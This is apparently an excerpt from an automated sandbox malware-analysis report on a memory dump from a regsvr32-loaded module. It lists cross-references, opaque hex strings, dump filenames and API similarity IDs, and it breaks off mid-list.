_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D210FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21102
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21108
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2110E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21114
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2111A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21120
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21126
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2112C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21132
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21138
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2113E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21144
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2114A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D21150

Strings

cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0, xrefs: 00007FF983D2072E
8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450, xrefs: 00007FF983D1D8BE
1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69, xrefs: 00007FF983D1DF57
35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b, xrefs: 00007FF983D1E90D
6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda, xrefs: 00007FF983D1F328
e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c, xrefs: 00007FF983D20B98
c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb, xrefs: 00007FF983D20C7A
194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07, xrefs: 00007FF983D1E89C
ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43, xrefs: 00007FF983D1C587
e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f, xrefs: 00007FF983D1F9AF
f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5, xrefs: 00007FF983D1ECFA
b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb, xrefs: 00007FF983D20B27
51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5, xrefs: 00007FF983D1E350
bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147, xrefs: 00007FF983D1F3FE
a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd, xrefs: 00007FF983D1CBEF
e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0, xrefs: 00007FF983D1DA82
10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861, xrefs: 00007FF983D1E3C1
66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201, xrefs: 00007FF983D208F2
95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4, xrefs: 00007FF983D1D6FA
8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f, xrefs: 00007FF983D1DEE6
f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312, xrefs: 00007FF983D1CE7F
c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909, xrefs: 00007FF983D1FEEF
dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb, xrefs: 00007FF983D206BD
8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e, xrefs: 00007FF983D1D257
a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653, xrefs: 00007FF983D1F6A4
c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1, xrefs: 00007FF983D20F14
ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1, xrefs: 00007FF983D1D76B
2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b, xrefs: 00007FF983D1E039
16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874, xrefs: 00007FF983D20124
13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07, xrefs: 00007FF983D20DCD
90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277, xrefs: 00007FF983D20042
980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1, xrefs: 00007FF983D20195
326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d, xrefs: 00007FF983D204F9
6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f, xrefs: 00007FF983D1ED6B
a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a, xrefs: 00007FF983D1FF60
f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700, xrefs: 00007FF983D1D536
ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335, xrefs: 00007FF983D1DE75
6d079b4125d59aa358b2f5904df97d742f41aeade445, xrefs: 00007FF983D1F4E0
2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214, xrefs: 00007FF983D20A45
9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9, xrefs: 00007FF983D1BF1F
475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923, xrefs: 00007FF983D1E2DF
d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce, xrefs: 00007FF983D203B2
1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7, xrefs: 00007FF983D1FC49
23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c, xrefs: 00007FF983D2064C
8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6, xrefs: 00007FF983D1EB42
ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1, xrefs: 00007FF983D1FE7E
277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23, xrefs: 00007FF983D1E749
26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f, xrefs: 00007FF983D1DB64
6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34, xrefs: 00007FF983D1F164
0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7, xrefs: 00007FF983D20CEB
6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153, xrefs: 00007FF983D1F011
3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0, xrefs: 00007FF983D1F399
58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461, xrefs: 00007FF983D202DC
f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e, xrefs: 00007FF983D1E9EF
9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33, xrefs: 00007FF983D20206
d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd, xrefs: 00007FF983D1DE04
06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5, xrefs: 00007FF983D1F0F3
022a590d2d2a261c2ff43f11893052504107314f076522501b83d9, xrefs: 00007FF983D1E26E
91a82fffab8959a91a27732300a81773d61b40ef25dee2254b, xrefs: 00007FF983D1F082
f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a, xrefs: 00007FF983D1F46F
19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0, xrefs: 00007FF983D1CD37
c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef, xrefs: 00007FF983D1DBCF
5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2, xrefs: 00007FF983D1E7BA
60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c, xrefs: 00007FF983D1F633
f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89, xrefs: 00007FF983D2026B
a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac, xrefs: 00007FF983D1D618
c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2, xrefs: 00007FF983D1C067
784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635, xrefs: 00007FF983D1F2B7
68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03, xrefs: 00007FF983D1FB67
8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207, xrefs: 00007FF983D1E6D8
b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290, xrefs: 00007FF983D1F8CD
c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae, xrefs: 00007FF983D1EEBE
d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3, xrefs: 00007FF983D1F868
d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57, xrefs: 00007FF983D20F81
bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af, xrefs: 00007FF983D1E4A3
0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997, xrefs: 00007FF983D1E432
44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230, xrefs: 00007FF983D1DAF3
75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c, xrefs: 00007FF983D1DC40
af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a, xrefs: 00007FF983D1F93E
6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84, xrefs: 00007FF983D1C2F7
4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc, xrefs: 00007FF983D1D84D
8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3, xrefs: 00007FF983D1D7DC
91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a, xrefs: 00007FF983D1E1FD
8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123, xrefs: 00007FF983D1DCB1
27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7, xrefs: 00007FF983D1DFC8
74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb, xrefs: 00007FF983D1E11B
ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62, xrefs: 00007FF983D1E82B
f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7, xrefs: 00007FF983D1FA20
a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849, xrefs: 00007FF983D1C817
cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee, xrefs: 00007FF983D2034D
931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112, xrefs: 00007FF983D20AB6
7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e, xrefs: 00007FF983D20963
d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4, xrefs: 00007FF983D1EF2F
a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529, xrefs: 00007FF983D1FD9C
9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a, xrefs: 00007FF983D20EAF
e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b, xrefs: 00007FF983D1EAD1
cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d, xrefs: 00007FF983D1D9A0
10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204, xrefs: 00007FF983D209D4
85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334, xrefs: 00007FF983D1C6CF
d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea, xrefs: 00007FF983D1F1D5
d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983, xrefs: 00007FF983D1C95F
d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7, xrefs: 00007FF983D1FBD8
68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046, xrefs: 00007FF983D1FFD1
9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904, xrefs: 00007FF983D1F715
d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee, xrefs: 00007FF983D1EA60
54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2, xrefs: 00007FF983D1D4C5
5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12, xrefs: 00007FF983D2079F
6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642, xrefs: 00007FF983D1EDDC
2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3, xrefs: 00007FF983D1FD2B
ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0, xrefs: 00007FF983D205DB
94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b, xrefs: 00007FF983D1C43F
ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c24e5cbf5464cd461da, xrefs: 00007FF983D1EFA0
66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f, xrefs: 00007FF983D1FCBA
d29f33018596af56885209a0391cf43d81722440b5, xrefs: 00007FF983D1E667
3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b, xrefs: 00007FF983D20C09
65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148, xrefs: 00007FF983D1F5C2
2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488, xrefs: 00007FF983D20D5C
eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae, xrefs: 00007FF983D1D689
23652a638c61b35ff5c0d664f45b77e574632037def9231080, xrefs: 00007FF983D1E18C
5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a, xrefs: 00007FF983D2056A
6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b, xrefs: 00007FF983D20423
0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371, xrefs: 00007FF983D1D10F
bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee, xrefs: 00007FF983D1F551
b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a, xrefs: 00007FF983D1CAA7
a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32, xrefs: 00007FF983D1E97E
80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f, xrefs: 00007FF983D1D39F
bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1, xrefs: 00007FF983D1E5F6
ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef, xrefs: 00007FF983D1CFC7
dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1, xrefs: 00007FF983D1E0AA
93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb, xrefs: 00007FF983D1FAF6
bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e, xrefs: 00007FF983D1D92F
bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697, xrefs: 00007FF983D1DD93
bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64, xrefs: 00007FF983D20E3E
c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494, xrefs: 00007FF983D20881
dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581, xrefs: 00007FF983D1F7F7
6f46400e097576c089e1826b85a329f52906284205151baf60e80608da, xrefs: 00007FF983D1D454
ff37083708963434836f8f0c252e8680adff9bc9a0451464a4, xrefs: 00007FF983D1F246
b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed, xrefs: 00007FF983D1DD22
fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2, xrefs: 00007FF983D1EE4D
8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751, xrefs: 00007FF983D20488
fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df, xrefs: 00007FF983D20810
adbb1de09138566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db, xrefs: 00007FF983D200B3
27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f, xrefs: 00007FF983D1C1AF
7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f, xrefs: 00007FF983D1EBA7
a246aef866f9432cd611cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa, xrefs: 00007FF983D1E514
360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91, xrefs: 00007FF983D1D5A7
b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c, xrefs: 00007FF983D1FA91
6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18, xrefs: 00007FF983D1BDD8
99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff, xrefs: 00007FF983D1EC89
ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace, xrefs: 00007FF983D1EC18
594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560, xrefs: 00007FF983D1E585
7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07, xrefs: 00007FF983D1DA11
1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78, xrefs: 00007FF983D1F786
ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3, xrefs: 00007FF983D1FE0D

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$_invalid_parameter_noinfo_noreturn$LibraryLoad$ByteCharMultiWide$ExitProcess
String ID: 022a590d2d2a261c2ff43f11893052504107314f076522501b83d9$06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5$0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371$0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997$0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7$10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861$10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204$13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07$16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874$194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07$19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0$1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78$1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7$1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69$2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3$23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c$23652a638c61b35ff5c0d664f45b77e574632037def9231080$26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f$277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23$27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7$27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f$2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488$2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b$2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214$326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d$35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b$360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91$3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0$3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b$44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230$475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923$4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc$51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5$54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2$58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461$594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560$5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12$5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a$5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2$60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c$6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642$65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148$66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f$66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201$68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03$68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046$6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda$6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84$6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18$6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b$6d079b4125d59aa358b2f5904df97d742f41aeade445$6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34$6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153$6f46400e097576c089e1826b85a329f52906284205151baf60e80608da$6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f$74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb$75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c$784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635$7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07$7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f$7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e$80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f$8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207$8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e$85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334$8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450$8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3$8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123$8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751$8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6$8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f$90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277$91a82fffab8959a91a27732300a81773d61b40ef25dee2254b$91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a$931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112$93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb$9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9$9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904$94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b$95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4$980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1$99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff$9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a$9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33$a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529$a246aef866f9432cd611cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa$a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849$a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a$a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd$a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653$a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac$a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32$ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335$ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace$adbb1de09138566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db$ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62$ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1$af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a$b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a$b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb$b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c$b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed$b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290$ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1$bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64$bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee$bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147$bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e$bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1$bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af$bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697$c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1$c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494$c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef$c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb$c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae$c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2$c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909$ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43$ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c